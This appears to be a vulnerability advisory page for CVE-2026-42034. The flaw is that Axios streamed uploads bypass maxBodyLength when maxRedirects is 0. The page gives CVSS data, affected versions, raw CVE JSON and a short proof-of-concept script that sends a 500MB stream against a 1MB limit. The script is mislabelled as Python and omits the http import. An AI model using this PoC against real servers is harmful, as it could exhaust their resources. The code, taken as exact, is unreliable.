Security Vulnerability Report
中文
CVE-2026-42034 CVSS 5.3 MEDIUM

CVE-2026-42034

Published: 2026-04-24 18:16:30
Last Modified: 2026-04-27 19:59:18
Source: [email protected]

Description

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:* - VULNERABLE
Axios < 1.15.1
Axios < 0.31.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
const axios = require('axios'); const { Readable } = require('stream'); // Simulate a large data stream (e.g., 500MB) const largeStream = new Readable({ read() {} }); // Push a large amount of data to bypass the limit // In a real attack, this could be an infinite stream or huge file const largePayload = 'x'.repeat(1024 * 1024 * 500); largeStream.push(largePayload); largeStream.push(null); // Configure axios with a strict body limit but vulnerable redirect setting axios.post('http://localhost:3000/upload', largeStream, { maxBodyLength: 1024 * 1024, // Set limit to 1MB (Intended to block the request) maxRedirects: 0, // Set to 0 triggers the vulnerable path headers: { 'Content-Type': 'application/octet-stream' }, httpAgent: new http.Agent({ keepAlive: true }) }).then(response => { console.log('Request sent successfully (Limit Bypassed)', response.status); }).catch(error => { console.error('Request failed:', error.message); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42034", "sourceIdentifier": "[email protected]", "published": "2026-04-24T18:16:30.140", "lastModified": "2026-04-27T19:59:18.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.31.1", "matchCriteriaId": "7D2B28C9-026E-4CD6-BD17-7EDD42108106"}, {"vulnerable": true, "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.15.1", "matchCriteriaId": "3EC1EF30-EBB8-410B-90FB-1F18A3545C2E"}]}]}], "references": [{"url": "https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.